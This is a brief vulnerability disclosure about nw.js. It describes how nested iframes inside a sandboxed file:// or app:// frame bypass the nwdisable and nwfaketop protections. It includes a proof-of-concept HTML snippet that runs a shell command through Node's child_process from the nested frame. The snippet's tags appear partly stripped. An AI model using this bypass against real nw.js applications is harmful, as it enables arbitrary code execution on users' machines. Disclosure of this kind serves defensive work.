Code execution in nw.js: bypassing nwdisable in file:// and app:// frames

It’s possible to bypass nwdisable and nwfaketop flags by nesting iframes inside top-level sandboxed iframe that uses file:// or app://.

Proof of concept

<!doctype html>
    <meta charset="utf-8">
    <title>Testing nwfaketop and nwdisable</title>
    <iframe src="file:///home/stardust/dev/sectest/node-webkit/nwfaketop/test.html" nwdisable nwfaketop>
   var exec = require('child_process').exec;
   exec('uname -a',function (error, stdout, stdin) {alert(stdout)});

<iframe src="file:///home/stardust/dev/sectest/node-webkit/nwfaketop/test.html">